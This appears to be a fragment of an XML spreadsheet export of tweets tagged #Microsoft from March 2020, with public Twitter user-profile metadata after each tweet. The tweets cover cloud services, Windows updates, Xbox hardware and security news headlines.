    <t>{'id': 944904573143146497, 'id_str': '944904573143146497', 'name': 'Modeloe', 'screen_name': 'Modeloeworld', 'location': 'London, England', 'description': 'Simple online template solution for smart Businesses &amp; organisations     #Templates: #Businesstemplates #Wordtemplates #Exceltemplates #Documenttemplates', 'url': 'https://t.co/eF2kjzmRhA', 'entities': {'url': {'urls': [{'url': 'https://t.co/eF2kjzmRhA', 'expanded_url': 'http://www.modeloe.com', 'display_url': 'modeloe.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Sun Dec 24 12:16:20 +0000 2017', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 601,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'http://pbs.twimg.com/profile_images/947284549238775810/t7cGYrny_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947284549238775810/t7cGYrny_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/944904573143146497/1514481273',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</si>
  <si>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09:21:26 +0000 2020</t>
  </si>
  <si>
    <t>Introducing Quantum Impact (Ep. 0)  https://t.co/kiFeV7dfbd   #Microsoft #Environment #Cloud #Quantum https://t.co/PrYfjoaAAf</t>
  </si>
  <si>
    <t>{'id': 3420777047, 'id_str': '3420777047', 'name': 'gurrammallareddy', 'screen_name': 'UK365GUY', 'location': 'England, United Kingdom', 'description': 'Microsoft Dynamics 365 consultant/developer, \nHaving years of experience in IT Industry.\nExperties CRM\nBlog: https://t.co/3rPAHNSDus', 'url': 'https://t.co/cXJTerzCzr', 'entities': {'url': {'urls': [{'url': 'https://t.co/cXJTerzCzr', 'expanded_url': 'http://www.gmrit-solutions.com', 'display_url': 'gmrit-solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/3rPAHNSDus', 'expanded_url': 'http://www.mscrmgmr.blogspot.co.uk', 'display_url': 'mscrmgmr.blogspot.co.uk', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 103, 'friends_count': 670, 'listed_count': 1, 'created_at': 'Thu Aug 13 19:37:50 +0000 2015', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 924,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'http://pbs.twimg.com/profile_images/1038056503079567360/p2xXQIkd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1038056503079567360/p2xXQIkd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3420777047/1543853624',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</si>
  <si>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Introducing Quantum Impact (Ep. 0)  https://t.co/TKAHnR1v2A   #Microsoft #Environment #Cloud #Quantum https://t.co/GGRb6sCyDr</t>
  </si>
  <si>
    <t>{'id': 890482962235625474, 'id_str': '890482962235625474', 'name': 'GMR IT SOLUTIONS LTD', 'screen_name': 'gmr_admin', 'location': 'England, United Kingdom', 'description': 'We are Microsoft Silver Partner,specialist in Microsoft  Dynamics 365,PowerApps Azure, IoT, Power BI. we deliver projects for small medium size businesses.', 'url': 'https://t.co/cXJTerzCzr', 'entities': {'url': {'urls': [{'url': 'https://t.co/cXJTerzCzr', 'expanded_url': 'http://www.gmrit-solutions.com', 'display_url': 'gmrit-solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 700, 'listed_count': 3, 'created_at': 'Thu Jul 27 08:04:17 +0000 2017', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 835,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'http://pbs.twimg.com/profile_images/1142852037828317184/jS51fc-I_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142852037828317184/jS51fc-I_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/890482962235625474/1561311937',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</si>
  <si>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09:21:05 +0000 2020</t>
  </si>
  <si>
    <t>CCL announces partnership with Microsoft to meet Azure demand
https://t.co/PoTeFErwUH 
#ccl #microsoft #azure #cloud #devops #infrastructure #migration #secure #issquared #hybridcloud https://t.co/dYkfK2W96u</t>
  </si>
  <si>
    <t>{'id': 1115112276, 'id_str': '1115112276', 'name': 'ISSQUARED, Inc', 'screen_name': 'IssquaredInc', 'location': 'Westlake Village, CA 91361', 'description': 'ISSQUAREDÂ® provides end-to-end security solutions for identifying threats and vulnerabilities,\nwhile defining real-time remediation of security breaches.', 'url': 'http://t.co/gViRUJan', 'entities': {'url': {'urls': [{'url': 'http://t.co/gViRUJan', 'expanded_url': 'http://www.issquaredinc.com/', 'display_url': 'issquaredinc.com', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 85, 'friends_count': 224, 'listed_count': 4, 'created_at': 'Wed Jan 23 19:31:11 +0000 2013', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2778,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'http://pbs.twimg.com/profile_images/1219213580895014912/BzrcwH8X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219213580895014912/BzrcwH8X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1115112276/1575484907',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</si>
  <si>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09:17:23 +0000 2020</t>
  </si>
  <si>
    <t>Csharp developers this doesn't mean you can ditch your null reference checks. I foresee some sloppy lazy code coming out of this.... https://t.co/F6QSYryZCH #Csharp #dotnet #dotnetcore #Software #softwaredevelopment #coding #code #Microsoft #programming</t>
  </si>
  <si>
    <t>Fri Mar 06 09:16:07 +0000 2020</t>
  </si>
  <si>
    <t>Hundreds of #Microsoft sub-domains open to #hijacking
https://t.co/V5qxhdjkRa
#securityaffairs #hacking</t>
  </si>
  <si>
    <t>{'id': 405658492, 'id_str': '405658492', 'name': 'Security Affairs', 'screen_name': 'securityaffairs', 'location': 'Napoli, Italy', 'description': 'Pierluigi Paganini, founder of Security Affairs and Cybaze SPA, ENISA ETL Group, Ethical Hacker, Researcher, Security Evangelist, Security Analyst.', 'url': 'http://t.co/V3OIFUqNCm', 'entities': {'url': {'urls': [{'url': 'http://t.co/V3OIFUqNCm', 'expanded_url': 'http://securityaffairs.co/wordpress/', 'display_url': 'securityaffairs.co/wordpress/', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29646, 'friends_count': 2514, 'listed_count': 1992, 'created_at': 'Sat Nov 05 16:26:57 +0000 2011', 'favourites_count': 2046, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 218377,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'http://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/405658492/1398237146',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</si>
  <si>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09:16:03 +0000 2020</t>
  </si>
  <si>
    <t>Joao Couto - Machines/robots will learn faster then humans. But they will lack creativity, the ability to collaborate or share experiences. We humans will still be needed  !
#iWD20 #modernworkplace #collaboration #microsoft</t>
  </si>
  <si>
    <t>{'id': 1949918078, 'id_str': '1949918078', 'name': 'Antje Lamartine', 'screen_name': 'AntjeLamartine', 'location': 'Munich, Germany', 'description': 'O365 Change &amp; User Adoption Consultant | Helps People Embrace Change and Work Smarter | Speaker &amp; SPS Organizer | Lover of Winter and Yarn', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 434, 'friends_count': 281, 'listed_count': 21, 'created_at': 'Wed Oct 09 19:12:57 +0000 2013', 'favourites_count': 867, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 546,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'http://pbs.twimg.com/profile_images/858080444755189760/5vRuEVSq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/858080444755189760/5vRuEVSq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1949918078/1432329153',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</si>
  <si>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09:13:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft reveals that 99.9% of compromised accounts on their platforms didn't use multi-factor authentication (#MFA), each month 0.5% new compromises, just in January 1.2M.  #cybersecurity
The main reason is that 60% of users re...https://t.co/HT09NuoQ86 https://t.co/PoC4RHc3Fn</t>
  </si>
  <si>
    <t>{'id': 374932904, 'id_str': '374932904', 'name': 'Mario Procopio', 'screen_name': 'The_Proc', 'location': 'Amsterdam, North Holland', 'description': 'Group Director of Cyber Security in VEON - I care to share cyber security information that is useful for my job, hopefully it can be interesting for you too !ðŸ¦‚', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 225, 'friends_count': 334, 'listed_count': 59, 'created_at': 'Sat Sep 17 06:35:54 +0000 2011', 'favourites_count': 779, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6472,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'http://pbs.twimg.com/profile_images/1211737828700413954/WRAdgGfd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211737828700413954/WRAdgGfd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/374932904/1452940416',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</si>
  <si>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09:13:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft &amp;amp; #Google join ranks offering free remote working tools amid #coronavirus outbreak https://t.co/Leto9gCkd0 https://t.co/haOuHVsb51</t>
  </si>
  <si>
    <t>{'id': 1218229083324211200, 'id_str': '1218229083324211200', 'name': 'Yarranton IT Services', 'screen_name': 'yarranton_it', 'location': '', 'description': 'Yarranton Limited are providers of managed IT services and support for Business users in the West Midlands', 'url': 'https://t.co/hEOJlGEHi9', 'entities': {'url': {'urls': [{'url': 'https://t.co/hEOJlGEHi9', 'expanded_url': 'https://yarranton.co.uk', 'display_url': 'yarranton.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Fri Jan 17 17:52:21 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1218230001675440129/Vpu0Xw51_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218230001675440129/Vpu0Xw51_normal.jpg',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</si>
  <si>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09:11:19 +0000 2020</t>
  </si>
  <si>
    <t>What a surprise!! Windows updates affecting #Windows10 in a negative way.....AGAIN! https://t.co/zCTjbKHQrU #Microsoft #Software #WindowsUpdates #technews #Technology</t>
  </si>
  <si>
    <t>Fri Mar 06 09:10:53 +0000 2020</t>
  </si>
  <si>
    <t>Following the feature sharing for #Microsoft's most powerful game console #XboxSeriesX , some of the highlights were 120FPS game support and 4K smooth gaming. Can we see these two together? Or is this necessary?</t>
  </si>
  <si>
    <t>{'id': 1234500120495951878, 'id_str': '1234500120495951878', 'name': 'Downloadloot', 'screen_name': 'downloadloot', 'location': 'United States', 'description': 'Secure Download Site ðŸ’¯\nFree Download Software, Apps, Games and E-Books\nOver +1000 Files ðŸ”½\n#Downloadloot', 'url': 'https://t.co/vyQPHdHT66', 'entities': {'url': {'urls': [{'url': 'https://t.co/vyQPHdHT66', 'expanded_url': 'https://downloadloot.com', 'display_url': 'downloadloot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Mon Mar 02 15:25:53 +0000 2020', 'favourites_count': 17,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'http://pbs.twimg.com/profile_images/1234742137742385154/AB0BPGgR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234742137742385154/AB0BPGgR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234500120495951878/1583220441',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</si>
  <si>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09:09:33 +0000 2020</t>
  </si>
  <si>
    <t>Windows 7 users are refusing to upgrade to Windows 10  despite Microsofts warnings
https://t.co/c6ilNNXYMd 
#microsoft #windows #operatingsystem #os #software #pc #system #issquared #desktop #upgrade https://t.co/9LyKyyUhxq</t>
  </si>
  <si>
    <t>Fri Mar 06 09:08:51 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">so #AMD and #Microsoft worked closely on DXR 1.1 for RDNA2 raytracing with low level API.
Bodes well for next gen xbox, wonder what API #Sony are using? cant see them using DXR surely </t>
  </si>
  <si>
    <t>{'id': 20589184, 'id_str': '20589184', 'name': 'BeN VeNoM', 'screen_name': 'BeN_VeNoM', 'location': 'East Midlands, UK', 'description': 'DJ/Producer/Gamer', 'url': 'http://t.co/g8UEl5uPGf', 'entities': {'url': {'urls': [{'url': 'http://t.co/g8UEl5uPGf', 'expanded_url': 'http://soundcloud.com/benvenom', 'display_url': 'soundcloud.com/benvenom', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 350, 'friends_count': 924, 'listed_count': 3, 'created_at': 'Wed Feb 11 13:21:04 +0000 2009', 'favourites_count': 4016, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1353,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'http://pbs.twimg.com/profile_images/3345035179/b68c464e6dc7ecd185ca500676ddc542_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3345035179/b68c464e6dc7ecd185ca500676ddc542_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20589184/1362750427',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</si>
  <si>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09:07:42 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/oVkZiYHZpG
#Microsoft #M365 Very good decision Microsoft!</t>
  </si>
  <si>
    <t>{'id': 1511468623, 'id_str': '1511468623', 'name': 'Sascha Fredrich', 'screen_name': 'SaschaF80', 'location': 'StÃ¤dteregion Aachen, Nordrhein-Westfalen', 'description': 'Consultant Microsoft Technology &amp; Cloud Solutions, MCT bei Bechtle AG, P-CSA', 'url': 'https://t.co/TzJXHzuZJg', 'entities': {'url': {'urls': [{'url': 'https://t.co/TzJXHzuZJg', 'expanded_url': 'http://de.linkedin.com/pub/sascha-fredrich/9b/131/47/', 'display_url': 'de.linkedin.com/pub/sascha-freâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1686, 'friends_count': 4998, 'listed_count': 461, 'created_at': 'Wed Jun 12 19:43:15 +0000 2013', 'favourites_count': 8550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37985,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'http://pbs.twimg.com/profile_images/477569481351237632/FVZpK4Jx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/477569481351237632/FVZpK4Jx_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1511468623/1473174084',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</si>
  <si>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09:05:06 +0000 2020</t>
  </si>
  <si>
    <t>#TIL: #Microsoft #SharePointOnline and #OneDrive data encryption at rest is #awesome! #BitLocker on all drives; #SQL TDE for metadata; files split in 64kb bits; encrypted with unique key per chunk; saved as blobs in #AzureStorage! https://t.co/fm2ForjoHt #Office365 #Microsoft365 https://t.co/AMkWJKRhzc</t>
  </si>
  <si>
    <t>{'id': 792683781777985536, 'id_str': '792683781777985536', 'name': 'Joel Jeffery', 'screen_name': 'JoelBlogs', 'location': 'Brighton, UK', 'description': 'Architect, trainer, SharePoint guru, Azure/Office 365/Microsoft 365 geek, code monkey.', 'url': 'https://t.co/hWbTPOWkKX', 'entities': {'url': {'urls': [{'url': 'https://t.co/hWbTPOWkKX', 'expanded_url': 'https://joelblogs.co.uk', 'display_url': 'joelblogs.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 249, 'listed_count': 0, 'created_at': 'Sun Oct 30 11:05:15 +0000 2016', 'favourites_count': 36,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'http://pbs.twimg.com/profile_images/1231889889723068416/A1yGCAC9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231889889723068416/A1yGCAC9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/792683781777985536/1582540412',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</si>
  <si>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09:05:00 +0000 2020</t>
  </si>
  <si>
    <t>In March, after #Cairo &amp;amp; #Lisbon still 3 new locations around the World for the Global #HPE #Microsoft #Hybridcloud Summit Roadshow 2020: #Dubai #Mexico and #Boston : get more info and secure your seat at https://t.co/IdMGI7xESb
@renggli_Urs @B_Hallmans @mamajoamato https://t.co/3Zmm7eDPf9</t>
  </si>
  <si>
    <t>{'id': 2835431208, 'id_str': '2835431208', 'name': 'Stephane Bureau', 'screen_name': 'SBUCloud', 'location': 'Grenoble, France', 'description': 'Founder of #Social_4U, Ex-HPE, @Onalytica\'s â€žGlobal Top 100 Cloud Influencers" #IoT #Edge #AI #ML #Cloud #HybridCloud #HPEMSFT #RedHat #GoogleCloud #Social4UTV', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 25261, 'friends_count': 18990, 'listed_count': 631, 'created_at': 'Mon Sep 29 06:39:14 +0000 2014', 'favourites_count': 3690, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13754,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'http://pbs.twimg.com/profile_images/605774533182812160/IkgZcc4m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/605774533182812160/IkgZcc4m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2835431208/1446450764',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</si>
  <si>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09:03:12 +0000 2020</t>
  </si>
  <si>
    <t>Bring AI to your data so you can gain deep knowledge about your business and customers like never before with #Microsoft Data Platform. https://t.co/zZeLZvgi5l</t>
  </si>
  <si>
    <t>{'id': 804433620047974400, 'id_str': '804433620047974400', 'name': 'â€¢ Iron Neo â€¢', 'screen_name': 'IronNeoCom', 'location': 'Russia', 'description': 'The official Twitter page for Iron Neo news\n â€¢ Microsoft Certified Partner â€¢ #Azure â€¢ #Microsoft365 â€¢ #PowerBI â€¢', 'url': 'https://t.co/DM5psZxHwA', 'entities': {'url': {'urls': [{'url': 'https://t.co/DM5psZxHwA', 'expanded_url': 'https://www.iron-neo.com', 'display_url': 'iron-neo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 57, 'friends_count': 799, 'listed_count': 0, 'created_at': 'Thu Dec 01 21:14:55 +0000 2016', 'favourites_count': 241, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 739,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'http://pbs.twimg.com/profile_images/804563445580525568/aJfDZ_iy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/804563445580525568/aJfDZ_iy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/804433620047974400/1480653288',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</si>
  <si>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09:00:50 +0000 2020</t>
  </si>
  <si>
    <t>Get unlimited cloud hosting services from JachOOs on the worlds leading cloud platforms.
 Visit: https://t.co/wSpKW2A5wJ
 Talk to us: +971-58-5224667 or  +971-43-468939
#Cloudhosting #Microsoftazure #aws #amazon #amazonwebservice #microsoft #Cloudcomputing #Cloudplatform https://t.co/xtXdleGhKc</t>
  </si>
  <si>
    <t>{'id': 722005189490839553, 'id_str': '722005189490839553', 'name': 'JachOOs', 'screen_name': 'JachOOsltd', 'location': '', 'description': '', 'url': 'https://t.co/kTvxmwGJOC', 'entities': {'url': {'urls': [{'url': 'https://t.co/kTvxmwGJOC', 'expanded_url': 'https://jachoos.com/', 'display_url': 'jachoos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 64, 'listed_count': 0, 'created_at': 'Mon Apr 18 10:13:46 +0000 2016', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 98,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'http://pbs.twimg.com/profile_images/722006847134294016/OxyZg6Ws_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/722006847134294016/OxyZg6Ws_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/722005189490839553/1461003208',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</si>
  <si>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09:00:28 +0000 2020</t>
  </si>
  <si>
    <t>In case you were wondering, YES you can run Microsoft workloads in AWS. #microsoft #Windows #aws https://t.co/GTEi906QWb</t>
  </si>
  <si>
    <t>{'id': 981095284930498561, 'id_str': '981095284930498561', 'name': 'kaskade', 'screen_name': 'kaskadecloud', 'location': 'Global', 'description': 'AWS Cloud Experts. We solve business problems with cloud technology.', 'url': 'https://t.co/5lYHxwcKpq', 'entities': {'url': {'urls': [{'url': 'https://t.co/5lYHxwcKpq', 'expanded_url': 'http://www.kaskade.cloud', 'display_url': 'kaskade.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 254, 'listed_count': 4, 'created_at': 'Tue Apr 03 09:05:18 +0000 2018', 'favourites_count': 506, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1215, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1000467681823387649/2NjUVejl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1000467681823387649/2NjUVejl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/981095284930498561/1522746508',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</si>
  <si>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09:00:19 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPFjt0 https://t.co/VSjY2lihil</t>
  </si>
  <si>
    <t>{'id': 2753869938, 'id_str': '2753869938', 'name': 'Eduardo Fonseca B.', 'screen_name': 'efonsecabcr', 'location': 'Costa Rica', 'description': 'Senior Software Engineer Specialized in #Microsoft #dotnetcore &amp; #azure Passionate for #socialgood with #technology #psychology &amp; #gamedev', 'url': 'https://t.co/5aIodhxT28', 'entities': {'url': {'urls': [{'url': 'https://t.co/5aIodhxT28', 'expanded_url': 'http://eduardofonseca.cr', 'display_url': 'eduardofonseca.cr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1688, 'friends_count': 3036, 'listed_count': 587, 'created_at': 'Fri Aug 22 04:13:15 +0000 2014', 'favourites_count': 3910, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 42639,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'http://pbs.twimg.com/profile_images/1200192956940128257/CGW8xfvG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200192956940128257/CGW8xfvG_normal.jpg',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</si>
  <si>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09:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 6 #Microsoft Newsletter featuring Don't Worry,... https://t.co/svdnon0bCs Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>{'id': 102782584, 'id_str': '102782584', 'name': 'Boriana Petrova', 'screen_name': 'borianapetrova', 'location': 'Sofia, Bulgaria', 'description': 'Microsoft Certified Trainer, Microsoft MVP for Excel, CEO of ITraining (https://t.co/sx4XNqpLp7); Founder of Bulgaria Excel Days annual conference', 'url': 'http://t.co/FJBB9foAUr', 'entities': {'url': {'urls': [{'url': 'http://t.co/FJBB9foAUr', 'expanded_url': 'http://about.me/boriana.petrova', 'display_url': 'about.me/boriana.petrova', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/sx4XNqpLp7', 'expanded_url': 'http://itraining.bg', 'display_url': 'itraining.bg', 'indices': [72, 95]}]}}, 'protected': False, 'followers_count': 609, 'friends_count': 514, 'listed_count': 120, 'created_at': 'Thu Jan 07 20:31:54 +0000 2010', 'favourites_count': 756, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11976,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'http://pbs.twimg.com/profile_images/1199295210553053184/c8um1_P0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199295210553053184/c8um1_P0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102782584/1574704516', 'profile_link_color': '0330A3',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</si>
  <si>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Fri Mar 06 08:51:16 +0000 2020</t>
  </si>
  <si>
    <t>Why #Google Is the Next #Microsoft | #Goog ... | https://t.co/Fi7HGJbjBH #Acer #Adoption #Android #Avatar #Compaq #Dell #Economics #Experiences #HewlettPackard #HTC #HTML #Huawei #IBM #Innovation #IOS #IPhone #Java #LDAP #Lego #LG #LinkedIn #MichaelDell #Motorola #OperatingSystem</t>
  </si>
  <si>
    <t>{'id': 22828899, 'id_str': '22828899', 'name': 'The Venture Company', 'screen_name': 'venturecompany', 'location': 'U.S.A.', 'description': 'The Venture Company is the inventor of a new operating-system for humanity.', 'url': 'https://t.co/Z5dgFT6XNp', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z5dgFT6XNp', 'expanded_url': 'http://venturecompany.com', 'display_url': 'venturecompany.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11939, 'friends_count': 0, 'listed_count': 189, 'created_at': 'Wed Mar 04 20:30:45 +0000 2009', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15729,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'http://pbs.twimg.com/profile_images/559067248573177856/NQ_shc-y_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/559067248573177856/NQ_shc-y_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22828899/1565988063',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</si>
  <si>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08:50:05 +0000 2020</t>
  </si>
  <si>
    <t>The new version of Cortana, a virtual assistant created by #Microsoft, will debut with the next major update to Windows 10 in April. Read more here: https://t.co/3zJTw6zsP6</t>
  </si>
  <si>
    <t>{'id': 3091405547, 'id_str': '3091405547', 'name': 'Marketplace AMP', 'screen_name': 'marketplaceamp', 'location': 'Cambridge, England', 'description': 'We specialise in all aspects of setting up, optimising &amp; amplifying online international marketplaces, inc: Amazon Advertising agency &amp; #Alexadevs', 'url': 'https://t.co/fK3f7iW1ND', 'entities': {'url': {'urls': [{'url': 'https://t.co/fK3f7iW1ND', 'expanded_url': 'http://www.marketplaceamp.com', 'display_url': 'marketplaceamp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 257, 'friends_count': 572, 'listed_count': 21, 'created_at': 'Fri Mar 13 18:41:39 +0000 2015', 'favourites_count': 281, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2264,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'http://pbs.twimg.com/profile_images/1019208191744364544/YioxgPxZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019208191744364544/YioxgPxZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3091405547/1546431824',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</si>
  <si>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08:47:29 +0000 2020</t>
  </si>
  <si>
    <t>DarkReading: Researchers Find 670+ Microsoft Subdomains Vulnerable to Takeover https://t.co/7Gn5f4NGNg 
#Microsoft #subdomain #websecurity #vulnerability</t>
  </si>
  <si>
    <t>{'id': 541829003, 'id_str': '541829003', 'name': 'Stephan Wolf', 'screen_name': 'WolfSec_ch', 'location': 'ZÃ¼rich', 'description': 'Cyber Security Expert / Blockchain Expert / Senior Security Engineer / Architect, #infosec #cybersecurity #cyberdefense, https://t.co/SREZG5pUkQ', 'url': 'https://t.co/EcUjLl2zXO', 'entities': {'url': {'urls': [{'url': 'https://t.co/EcUjLl2zXO', 'expanded_url': 'http://www.wolfsec.ch', 'display_url': 'wolfsec.ch', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/SREZG5pUkQ', 'expanded_url': 'http://wolfsec.ch', 'display_url': 'wolfsec.ch', 'indices': [121, 144]}]}}, 'protected': False, 'followers_count': 8973, 'friends_count': 1999, 'listed_count': 220, 'created_at': 'Sat Mar 31 17:27:20 +0000 2012', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42905, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D8D8D8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/901897299093278721/3TEyZhGb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/901897299093278721/3TEyZhGb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/541829003/1505081903', 'profile_link_color': '0B0B61',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</si>
  <si>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08:43:13 +0000 2020</t>
  </si>
  <si>
    <t>.@MSLearning,@Microsoft
#Microsoft 365 Mobility and Security (MS-101T00-A) running March 23-27 2020 in London &amp;amp; Online is guaranteed to run #GTR.  Book you place now.
https://t.co/YPABOtmevB https://t.co/ZKCP2fdEa1</t>
  </si>
  <si>
